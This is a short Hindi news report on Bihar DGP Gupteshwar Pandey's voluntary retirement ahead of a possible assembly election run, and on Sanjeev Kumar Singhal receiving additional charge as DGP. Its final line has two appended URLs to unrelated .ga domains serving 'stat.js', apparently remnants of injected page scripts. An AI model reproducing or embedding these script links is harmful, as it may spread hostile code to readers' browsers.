बिहार के डीजीपी गुप्तेश्वर पांडे को लेकर एक बड़ी खबर सामने आ रही है। उन्होंने डीजीपी पद से मंगलवार को स्वैच्छिक सेवानिवृत्ति ले ली है। बताया जा रहा है कि वह राष्ट्रीय जनतांत्रिक गठबंधन एनडीए के प्रत्याशी के रूप में बिहार विधानसभा चुनाव लड़ने का सोच रहे हैं। पुलिस सेवा के बाद या राजनेता के रूप में वे अब देश की सेवा करते हुए नजर आएंगे।
आपको बता दें कि वह 987 बैच के भारतीय पुलिस सेवा के अधिकारी थे। खबरों के मुताबिक हो सकता है कि वह बक्सर या आरा जिले के किसी सीट के लिए विधानसभा चुनाव में उतरे। इसके पूर्व भी वे 2009 में वीआरएस का आवेदन देकर लोकसभा चुनाव लडऩे की कोशिश कर चुके थे। इस बीच राज्य सरकार ने फायर सर्विस व होमगार्ड के डीजी संजीव सिंघल को डीजीपी का अतिरिक्त प्रभार दिया है। बताया जा रहा है कि पिछले दिनों बक्सर में जेडीयू जिला अध्यक्ष के साथ उनकी बैठक भी हुई है|
बिहार के डीजीपी का अतिरिक्त प्रभार होमगार्ड के डीजी संजीव कुमार सिंघल को दिया गया है। देर रात इसकी अधिसूचना गृह विभाग द्वारा मंगलवार को जारी करी गयी थी 1988 बैच के सीनियर आइपीएस अधिकारी संजीव कुमार सिंघल मुख्यमंत्री नीतीश कुमार के गृह जिले नालंदा समेत कई जिलों के एसपी, एसएसपी, डीआइजी, आइजी, एडीजी और डीजी के पद पर कार्य कार्यरत रहे हैं। सिंघल का नाम बिहार के तेजतर्रार अफसरों में शुमार है। चर्चा है कि सरकार डीजीपी पद पर जल्दी ही सिंघल की पूर्णकालिक तैनाती कर देगी।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms